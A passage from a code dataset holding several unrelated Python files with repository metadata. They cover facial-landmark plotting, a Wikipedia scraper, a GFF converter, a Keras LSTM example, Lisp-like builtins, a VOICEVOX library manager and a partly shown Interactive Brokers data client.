e2e(easy_images.to(location))\n hard_pdm, hard_hg, pdm_3d_hard, pdm_affparam_hard = e2e(hard_images.to(location))\n\n json.dump({\n \"3d_easy\" : pdm_3d_easy.detach().cpu().numpy().tolist(),\n \"affine_params_easy\" : pdm_affparam_easy.detach().cpu().numpy().tolist(),\n \"3d_hard\" : pdm_3d_hard.detach().cpu().numpy().tolist(),\n \"affine_params_hard\" : pdm_affparam_hard.detach().cpu().numpy().tolist()\n }, open(os.path.join(args.target, \"3dcoords.json\"), \"w\"))\n\n # get unnormalized images in cv2 format\n easy_images_np = easy[\"original_image\"].numpy()\n hard_images_np = hard[\"original_image\"].numpy()\n\n plot_best_improvements(easy_hg, easy_pdm, easy_gt, easy_images_np, os.path.join(args.target, \"easy\"), args.n)\n plot_best_improvements(hard_hg, hard_pdm, hard_gt, hard_images_np, os.path.join(args.target, \"hard\"), args.n)\n\n", "repo_name": "simonhessner/masters-thesis-final", "sub_path": "code/end2end/plot_biggest_improvements.py", "file_name": "plot_biggest_improvements.py", "file_ext": "py", "file_size_in_byte": 6578, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.mean", "line_number": 23, "usage_type": "call"}, {"api_name": "common.util.mkdir_if_not_exists", "line_number": 35, "usage_type": "call"}, {"api_name": "tools.visualize_predictions.draw_landmarks", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.add_description", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.draw_landmarks", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.add_description", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.draw_landmarks", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.add_description", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.add_border", "line_number": 56, "usage_type": "call"}, {"api_name": "tools.visualize_predictions.gallery", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.add_border", "line_number": 60, "usage_type": "call"}, {"api_name": "tools.visualize_predictions.gallery", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.add_description", "line_number": 65, "usage_type": "call"}, {"api_name": "tools.visualize_predictions.gallery", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tools.visualize_predictions.gallery", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 75, "usage_type": "call"}, {"api_name": "common.util.mkdir_if_not_exists", "line_number": 84, "usage_type": "call"}, {"api_name": "end2end.run_all.load_hg", "line_number": 89, "usage_type": "call"}, {"api_name": "end2end.run_all.load_pdm", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.autograd.set_detect_anomaly", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.cuda.set_device", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 97, "usage_type": "call"}, {"api_name": "datasets.facial_landmarks.FaceLandmarksTrainingData.TRAIN_MEAN", "line_number": 99, "usage_type": "attribute"}, {"api_name": "datasets.facial_landmarks.FaceLandmarksTrainingData", "line_number": 99, "usage_type": "name"}, {"api_name": "datasets.facial_landmarks.FaceLandmarksTrainingData.TRAIN_STD", "line_number": 99, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 100, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 100, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 102, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 102, "usage_type": "name"}, {"api_name": "common.transforms.ImageTransform", "line_number": 103, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToPILImage", "line_number": 103, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 103, "usage_type": "name"}, {"api_name": "common.transforms.ImageTransform", "line_number": 104, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 104, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 104, "usage_type": "name"}, {"api_name": "common.transforms.ImageTransform", "line_number": 105, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 111, "usage_type": "call"}, {"api_name": "datasets.facial_landmarks.FaceLandmarksEasyTestData", "line_number": 112, "usage_type": "call"}, {"api_name": "datasets.facial_landmarks.FaceLandmarksHardTestData", "line_number": 113, "usage_type": "call"}, {"api_name": "end2end.run_all.E2E", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.utils.data.dataloader.DataLoader", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.utils.data.dataloader.DataLoader", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 125, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}]} +{"seq_id": "914520887", "text": "import requests\nfrom lxml import html\nencabezados = {\n\"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36\"\n}\nurl = 'https://www.wikipedia.org/'\nresult = requests.get(url, headers=encabezados)\nparse = html.fromstring(result.text)\n#idiomas = parse.xpath(\"//div[contains(@class,'central-featured-lang')]//strong/text()\")\n#for idioma in idiomas:\n #print(idiomas)\nidiomas = parse.find_class('central-featured-lang')\nfor idioma in idiomas:\n print(idioma.text_content())\n\n", "repo_name": "Daroso-96/Scraping", "sub_path": "nivel1/nivel_uno_wikepedia.py", "file_name": "nivel_uno_wikepedia.py", "file_ext": "py", "file_size_in_byte": 547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 8, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "6772655006", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport gzip\nimport sys\n\nfrom collections import OrderedDict\n\n\ndef deal_gff_info(info):\n return dict(map(lambda x: x.split(\"=\"), info.split(\";\")))\n\n\ndef read_gff(gfffile):\n if gfffile[-2:] == \"gz\":\n openfile = gzip.open(gfffile)\n else:\n openfile = open(gfffile)\n name = ''\n db = OrderedDict()\n flag = 1\n with openfile as fp:\n for line in fp:\n if line[0] == \"#\":\n continue\n\n line_list = line.strip().split(\"\\t\")\n if line_list[2] == \"mRNA\":\n flag = 1\n name = deal_gff_info(line_list[8])[\"Name\"]\n db[name] =[line_list[0], line_list[3], line_list[4],\n line_list[3], line_list[4], line_list[6], name, name, \"\", [], []]\n # elif line_list[2] == 'mRNA' and flag == 1:\n # db[name][3] = line_list[3]\n # db[name][4] = line_list[4]\n elif line_list[2] == 'CDS':\n db[name][9].append(line_list[3])\n db[name][10].append(line_list[4])\n\n return db\n\ndef out_result(gfffile):\n db = read_gff(gfffile)\n for gene in db:\n db[gene][9] = \",\".join(db[gene][9])\n db[gene][10] = \",\".join(db[gene][10])\n print(\"\\t\".join(db[gene]))\n\n\nif __name__ == \"__main__\":\n out_result(sys.argv[1])\n \n\n", "repo_name": "wangyibin/TDGP", "sub_path": "utils/gff2refbed.py", "file_name": "gff2refbed.py", "file_ext": "py", "file_size_in_byte": 1379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "gzip.open", "line_number": 17, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 52, "usage_type": "attribute"}]} +{"seq_id": "11822454749", "text": "# -*- coding: utf-8 -*-\nimport random\nimport numpy as np\nfrom keras import layers\nfrom keras.models import Sequential\nfrom six.moves import range\n\n\n# 学習データを作成\nDIM = 30\nINPUT_MAX_LEN = 10\nOUTPUT_MAX_LEN = 10\nTRAINING_SIZE = 200\n\nx_data = []\ny_data = []\n\nfor i in range(TRAINING_SIZE + 10):\n # 入力の累積を出力\n s = 0\n xx = []\n yy = []\n for j in range(INPUT_MAX_LEN):\n rnd = random.randint( 0, 3 )\n x = np.zeros( DIM, dtype=np.bool )\n x[rnd] = True # one-hot voctorにする\n s += rnd\n \n y = np.zeros( DIM, dtype=np.bool )\n y[s] = True # one-hot voctorにする\n\n xx.append(x)\n yy.append(y)\n \n x_data.append(xx)\n y_data.append(yy)\n \nx_data = np.array(x_data)\ny_data = np.array(y_data)\n\n\n# 学習用と評価用に分割\nx_train = x_data[:TRAINING_SIZE]\ny_train = y_data[:TRAINING_SIZE]\n\nx_val = x_data[TRAINING_SIZE:]\ny_val = y_data[TRAINING_SIZE:]\n\n\n# 学習データ生成\nRNN = layers.LSTM\nHIDDEN_SIZE = 256\nBATCH_SIZE = 128\nLAYERS = 1\n\n# モデル構築\ndef model():\n m = Sequential()\n from keras.layers.core import Dense, Reshape\n from keras.layers.wrappers import TimeDistributed\n m.add(RNN(HIDDEN_SIZE, input_shape=(INPUT_MAX_LEN, DIM)))\n m.add(Dense(OUTPUT_MAX_LEN * DIM))\n m.add(Reshape((OUTPUT_MAX_LEN, DIM)))\n m.add(TimeDistributed(Dense(DIM, activation='softmax')))\n return m\n\nmodel = model()\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\nmodel.summary()\n\n# 学習\nfor iteration in range(1, 200):\n print()\n print('-----------')\n print('Iteration', iteration)\n model.fit(x_train, y_train,\n batch_size=BATCH_SIZE,\n epochs=1,\n validation_data=(x_val, y_val))\n\n# テスト\nfor i in range(10):\n #ind = np.random.randint(0, len(x_val))\n #rowx, rowy = x_val[np.array([ind])], y_val[np.array([ind])] # replace by x_val, y_val\n preds = model.predict_classes( np.array([x_val[i]]), verbose=0)\n print( \"input: \", [ np.argmax(x) for x in x_val[i] ] )\n print( \"output: \", preds )\n print(\"--------\")\n \n", "repo_name": "naka-tomo/tf_test", "sub_path": "seq2seq.py", "file_name": "seq2seq.py", "file_ext": "py", "file_size_in_byte": 2192, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "six.moves.range", "line_number": 18, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 23, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 51, "usage_type": "attribute"}, {"api_name": "keras.layers", "line_number": 51, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 58, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.layers.core.Reshape", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.wrappers.TimeDistributed", "line_number": 64, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 64, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 74, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "18904347807", "text": "from fractions import Fraction\n\n'''\nSome builtin functions for bach's runtime\nbach_add/bach_sub etc correspond to +/-...\nsee bach_ast for mapping(bach converts all those labels into valid python labels)\nMost of those implementations don't feel pythonic, and that's intentional\nThose functions would be used frequently, so we \ntry to write them more efficiently without too much magic\n'''\n\ndef symbol():\n class BachSymbol(object):\n def __init__(self, value):\n self.value = value\n\n def __repr__(self):\n return \"'%s\" % self.value\n\n def __str__(self):\n return repr(self)\n\n def car(list):\n return list[0]\n\n def cdr(list):\n return list[1:]\n\n def cons(head, tail):\n return [head] + tail\n\n def bach_add(*values):\n return sum(values)\n\n def bach_sub(*values):\n if len(values) == 0:\n raise BachArgumentError(\"expected 1 or more got 0 args for -\")\n elif len(values) == 1:\n return -values[0]\n else:\n value = values[0]\n for n in values[1:]:\n value -= n\n return value\n\n def display(value):\n print(value)\n\n def string(*values):\n result = ''\n for value in values:\n result += value\n return result\n\n def bach_eq(*values):\n if len(values) == 0:\n raise BachArgumentError(\"expected 1 or more got 0 args for =\")\n first = values[0]\n for value in values[1:]:\n if value != first:\n return False\n return True\n\n def bach_neq(*values):\n if len(values) == 0:\n raise BachArgumentError(\"expected 1 or more got 0 args for !=\")\n first = values[0]\n for value in values[1:]:\n if value != first:\n return True\n return False\n\n def bach_gt(*values):\n if len(values) == 0:\n raise BachArgumentError(\"expected 1 or more got 0 args for >\")\n current = values[0]\n for value in values[1:]:\n if current <= value:\n return False\n current = value\n return True\n\n def bach_lt(*values):\n if len(values) == 0:\n raise BachArgumentError(\"expected 1 or more got 0 args for =\")\n current = values[0]\n for value in values[1:]:\n if current >= value:\n return False\n current = value\n return True\n\n def bach_mult(*values):\n value = 1\n for n in values:\n value *= n\n return value\n\n def bach_div(*values):\n if len(values) == 0:\n raise BachArgumentError(\"expected 1 or more got 0 args for /\")\n elif len(values) == 1:\n if isinstance(values[0], (int, Fraction)):\n return Fraction(1, values[0])\n else:\n return 1 / values[0]\n else:\n value = values[0]\n for d in values[1:]:\n if isinstance(value, (int, Fraction)) and isinstance(d, (int, Fraction)):\n return Fraction(value, d)\n else:\n return value / d\n\n return BachSymbol\n\n__all__ = ['car', 'cdr', 'cons', 'bach_add', 'bach_sub', 'bach_mult', 'bach_div', 'display', 'symbol']\n\n\n\n# e? -> is_e\n\n# + bach_add\n# - bach_sub\n# * bach_mult\n# / bach_div\n# > bach_gt\n# < bach_lt\n# = bach_eq\n# >= bach_gte\n# != bach_ne\n# <= bach_lte\n# and bach_and\n", "repo_name": "alehander92/bach", "sub_path": "bach/bach_stl/functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 3457, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fractions.Fraction", "line_number": 103, "usage_type": "name"}, {"api_name": "fractions.Fraction", "line_number": 104, "usage_type": "call"}, {"api_name": "fractions.Fraction", "line_number": 110, "usage_type": "name"}, {"api_name": "fractions.Fraction", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "2242183840", "text": "import base64\nimport json\nimport zipfile\nfrom io import BytesIO\nfrom pathlib import Path\nfrom typing import List\n\nfrom fastapi import HTTPException\n\nfrom voicevox_engine.model import DownloadableLibrary\n\n__all__ = [\"LibraryManager\"]\n\nINFO_FILE = \"metas.json\"\n\n\nclass LibraryManager:\n def __init__(self, library_root_dir: Path):\n self.library_root_dir = library_root_dir\n self.library_root_dir.mkdir(exist_ok=True)\n\n def downloadable_libraries(self):\n # == ダウンロード情報をネットワーク上から取得する場合\n # url = \"https://example.com/downloadable_libraries.json\"\n # response = requests.get(url)\n # return list(map(DownloadableLibrary.parse_obj, response.json()))\n\n # == ダウンロード情報をjsonファイルから取得する場合\n # with open(\n # self.root_dir / \"engine_manifest_assets\" / \"downloadable_libraries.json\",\n # encoding=\"utf-8\",\n # ) as f:\n # return list(map(DownloadableLibrary.parse_obj, json.load(f)))\n\n # ダミーとして、speaker_infoのアセットを読み込む\n with open(\n \"./engine_manifest_assets/downloadable_libraries.json\",\n encoding=\"utf-8\",\n ) as f:\n libraries = json.load(f)\n speaker_info = libraries[0][\"speakers\"][0][\"speaker_info\"]\n mock_root_dir = Path(\"./speaker_info/7ffcb7ce-00ec-4bdc-82cd-45a8889e43ff\")\n speaker_info[\"policy\"] = (mock_root_dir / \"policy.md\").read_text()\n speaker_info[\"portrait\"] = base64.b64encode(\n (mock_root_dir / \"portrait.png\").read_bytes()\n )\n for style_info in speaker_info[\"style_infos\"]:\n style_id = style_info[\"id\"]\n style_info[\"icon\"] = base64.b64encode(\n (mock_root_dir / \"icons\" / f\"{style_id}.png\").read_bytes()\n )\n style_info[\"voice_samples\"] = [\n base64.b64encode(\n (\n mock_root_dir / \"voice_samples\" / f\"{style_id}_{i:0>3}.wav\"\n ).read_bytes()\n )\n for i in range(1, 4)\n ]\n return list(map(DownloadableLibrary.parse_obj, libraries))\n\n def installed_libraries(self) -> List[DownloadableLibrary]:\n library = []\n for library_dir in self.library_root_dir.iterdir():\n if library_dir.is_dir():\n with open(library_dir / INFO_FILE, encoding=\"utf-8\") as f:\n library.append(json.load(f))\n return library\n\n def install_library(self, library_id: str, file: BytesIO):\n for downloadable_library in self.downloadable_libraries():\n if downloadable_library.uuid == library_id:\n library_info = downloadable_library.dict()\n break\n else:\n raise HTTPException(status_code=404, detail=\"指定された音声ライブラリが見つかりません。\")\n library_dir = self.library_root_dir / library_id\n library_dir.mkdir(exist_ok=True)\n with open(library_dir / INFO_FILE, \"w\", encoding=\"utf-8\") as f:\n json.dump(library_info, f, indent=4, ensure_ascii=False)\n with zipfile.ZipFile(file) as zf:\n if zf.testzip() is not None:\n raise HTTPException(status_code=422, detail=\"不正なZIPファイルです。\")\n\n zf.extractall(library_dir)\n return library_dir\n", "repo_name": "PickledChair/voicevox_engine", "sub_path": "voicevox_engine/downloadable_library.py", "file_name": "downloadable_library.py", "file_ext": "py", "file_size_in_byte": 3536, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 18, "usage_type": "name"}, {"api_name": "json.load", "line_number": 40, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 42, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 44, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 49, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 53, "usage_type": "call"}, {"api_name": "voicevox_engine.model.DownloadableLibrary.parse_obj", "line_number": 60, "usage_type": "attribute"}, {"api_name": "voicevox_engine.model.DownloadableLibrary", "line_number": 60, "usage_type": "name"}, {"api_name": "json.load", "line_number": 67, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 62, "usage_type": "name"}, {"api_name": "voicevox_engine.model.DownloadableLibrary", "line_number": 62, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 70, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 76, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 80, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 81, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "18655589999", "text": "from ibapi.wrapper import EWrapper\nfrom ibapi.client import EClient\nfrom ibapi.common import *\nimport sys\nfrom ContractSamples import ContractSamples\nimport time\nfrom datetime import datetime, timedelta\nimport math\nimport pandas as pd\nimport logging\nimport os\nimport queue\nfrom ibapi.contract import Contract\n\nfrom ibapi import comm\n\ndef printWhenExecuting(fn):\n def fn2(self):\n print(\" doing\", fn.__name__)\n fn(self)\n print(\" done w/\", fn.__name__)\n\n return fn2\n\ndef SetupLogger():\n if not os.path.exists(\"log\"):\n os.makedirs(\"log\")\n\n time.strftime(\"pyibapi.%Y%m%d_%H%M%S.log\")\n\n recfmt = '(%(threadName)s) %(asctime)s.%(msecs)03d %(levelname)s %(filename)s:%(lineno)d %(message)s'\n\n timefmt = '%y%m%d_%H:%M:%S'\n\n #logging.basicConfig(level=logging.DEBUG,\n # format=recfmt, datefmt=timefmt)\n logging.basicConfig(filename=time.strftime(\"log/pyibapi.%y%m%d_%H%M%S.log\"),\n filemode=\"w\",\n level=logging.INFO,\n format=recfmt, datefmt=timefmt)\n logger = logging.getLogger()\n console = logging.StreamHandler()\n console.setLevel(logging.ERROR)\n logger.addHandler(console)\n\n\nclass TestWrapper(EWrapper):\n def __init__(self):\n EWrapper.__init__(self)\n self.historical_data = []\n self.historicalDataRequestIds = []\n self.historicalDataReceivedIds = []\n self.earliestTradeDate = ''\n self.endOfHistoricalData = False\n self.positions = {}\n self.positionsEnd = False\n\n def position(self, account: str, contract: Contract, position: float, avgCost: float):\n super().position(account, contract, position, avgCost)\n self.positions[contract.symbol] = [contract.secType, contract.strike, position, avgCost]\n\n def positionEnd(self):\n super().positionEnd()\n self.positionsEnd =True\n print(self.positions)\n\n def error(self, reqId: TickerId, errorCode: int, errorString: str):\n print(\"Error: \", reqId, \" Code: \", errorCode, \" Msg: \", errorString+'\\n')\n if errorCode == 162:\n self.endOfHistoricalData = True\n self.historicalDataEnd(reqId, \"\", \"\")\n if errorCode == 502:\n sys.exit()\n\n def headTimestamp(self, reqId: int, headTimestamp: str):\n print(\"HeadTimestamp: \", reqId, \" \", headTimestamp)\n self.earliestTradeDate = headTimestamp\n\n # ! [historicaldata]\n def historicalData(self, reqId:int, bar: BarData):\n #print(\"HistoricalData. \", reqId, \" Date:\", bar.date, \"Open:\", bar.open,\n # \"High:\", bar.high, \"Low:\", bar.low, \"Close:\", bar.close, \"Volume:\", bar.volume,\n # \"Count:\", bar.barCount, \"WAP:\", bar.average)\n self.historical_data.append([reqId, bar.date, bar.open, bar.high, bar.low, bar.close, bar.volume, bar.barCount, bar.average])\n #if not self.historicalDataReceivedIds.count(reqId): self.historicalDataReceivedIds.append(reqId)\n # ! [historicaldata]\n\n # ! [historicaldataend]\n def historicalDataEnd(self, reqId: int, start: str, end: str):\n super().historicalDataEnd(reqId, start, end)\n print(\"HistoricalDataEnd \", reqId, \"from\", start, \"to\", end)\n # ! [historicaldataend]\n\n # ! [historicalDataUpdate]\n def historicalDataUpdate(self, reqId: int, bar: BarData):\n print(\"HistoricalDataUpdate. \", reqId, \" Date:\", bar.date, \"Open:\", bar.open,\n \"High:\", bar.high, \"Low:\", bar.low, \"Close:\", bar.close, \"Volume:\", bar.volume,\n \"Count:\", bar.barCount, \"WAP:\", bar.average)\n # ! [historicalDataUpdate]\n\n # ! [securityDefinitionOptionParameter]\n def securityDefinitionOptionParameter(self, reqId: int, exchange: str,\n underlyingConId: int, tradingClass: str, multiplier: str,\n expirations: SetOfString, strikes: SetOfFloat):\n super().securityDefinitionOptionParameter(reqId, exchange,\n underlyingConId, tradingClass, multiplier, expirations, strikes)\n print(\"Security Definition Option Parameter. ReqId:\", reqId, \"Exchange:\", exchange, \"Underlying conId:\", underlyingConId)\n #print(\"Security Definition Option Parameter. ReqId:%d Exchange:%s Underlying conId: %d \" % reqId, exchange, underlyingConId)\n #print(\"TradingClass:%s Multiplier:%s Exp:%s Strikes:%s\" % tradingClass, multiplier, \",\".join(expirations), \",\".join(str(strikes)))\n print(\"TradingClass:\", tradingClass, \"Multiplier:\", multiplier, \"Exp:\", \",\".join(expirations))\n print(\"Strikes:\", strikes)\n # ! [securityDefinitionOptionParameter]\n\n # ! [securityDefinitionOptionParameterEnd]\n def securityDefinitionOptionParameterEnd(self, reqId: int):\n super().securityDefinitionOptionParameterEnd(reqId)\n print(\"Security Definition Option Parameter End. Request: \", reqId)\n # ! [securityDefinitionOptionParameterEnd]\n\n\n\nclass TestClient(EClient):\n def __init__(self, wrapper):\n EClient.__init__(self, wrapper)\n\n\nclass TestApp(TestClient, TestWrapper):\n def __init__(self):\n TestWrapper.__init__(self)\n TestClient.__init__(self, wrapper=self)\n self.nKeybInt = 0\n self.started = False\n self.nextValidOrderId = None\n self.nextRequestId = 5000\n self.historicalDataFrame = pd.DataFrame(columns=[\"reqID\", \"Date\", \"Open\", \"High\", \"Low\",\n \"Close\", \"Volume\", \"Count\", \"WAP\"])\n self.permId2ord = {}\n #self.reqId2nErr = collections.defaultdict(int)\n self.globalCancelOnly = False\n self.simplePlaceOid = None\n self.sampleStock = ContractSamples.USStockAtSmart()\n self.historicalDataReceived = False\n\n #@printWhenExecuting\n def checkQueue(self):\n try:\n print(\"*********Checking Queue***************\")\n text = self.msg_queue.get(block=True, timeout=0.2)\n except queue.Empty:\n print(\"-------------Queue is empty---------------\")\n logging.debug(\"queue.get: empty\")\n else:\n print(\"+++++++++++Reading Data++++++++++++++++++\")\n fields = comm.read_fields(text)\n logging.debug(\"fields %s\", fields)\n #print(datetime.now(), 'CALLING INTERPRETER TOO')\n self.decoder.interpret(fields)\n\n def reqPositions(self):\n super().reqPositions()\n while not self.positionsEnd:\n self.checkQueue()\n\n @printWhenExecuting\n def earliestTradeDate_req(self):\n print('current Stock is:', self.sampleStock.symbol)\n # ! [reqHeadTimeStamp]\n self.reqHeadTimeStamp(self.nextRequestId, self.sampleStock, \"TRADES\", 0, 1)\n # ! [reqHeadTimeStamp]\n time.sleep(1)\n # check the queue if it has arrived\n while self.earliestTradeDate == '':\n self.checkQueue()\n self.sampleStock.earliestTradeDate = self.earliestTradeDate\n # ! [cancelHeadTimestamp]\n self.cancelHeadTimeStamp(self.nextRequestId)\n # ! [cancelHeadTimestamp]\n\n # Increment the request Id\n self.nextRequestId += 1\n\n @printWhenExecuting\n def historicalDataRequests_req(self):\n # ! [reqhistoricaldata]\n #queryTime = (datetime.datetime.today() - datetime.timedelta(days=180)).strftime(\"%Y%m%d %H:%M:%S\")\n dateFormatStr = \"%Y%m%d %H:%M:%S\"\n queryTime = datetime.today().strftime(dateFormatStr)\n #queryTime = '20040302 14:30:00'\n # print(\"queryTime = \", queryTime)\n print(\"earliest trades date = \", self.earliestTradeDate)\n print(\"earliest trades date = \", self.sampleStock.earliestTradeDate)\n timeRange = datetime.strptime(queryTime, dateFormatStr) - datetime.strptime(self.earliestTradeDate, dateFormatStr)\n requestPeriod = timedelta(weeks=2)\n steps = math.ceil(timeRange/requestPeriod)\n print(\"Steps:\", steps)\n try:\n for i in range(int(steps)):\n # for i in range(1):\n print(\"step:\", i, \"out of\", steps)\n self.historicalDataReceived = False\n #requestID = 5000\n print('Current stock is:', self.sampleStock.symbol)\n self.reqHistoricalData(self.nextRequestId, self.sampleStock, queryTime,\n \"2 W\", \"5 mins\", \"TRADES\", 1, 1, False, [])\n\n print(\"Requested historical data\")\n\n while (not self.historicalDataReceived) and (not self.endOfHistoricalData):\n self.checkQueue()\n\n # Decriment the query time and Increment the request Id\n queryTime = (datetime.strptime(queryTime, dateFormatStr) - timedelta(weeks=2)).strftime(dateFormatStr)\n self.nextRequestId += 1\n\n if self.endOfHistoricalData:\n print('*************NO MORE DATA************************')\n break\n else:\n 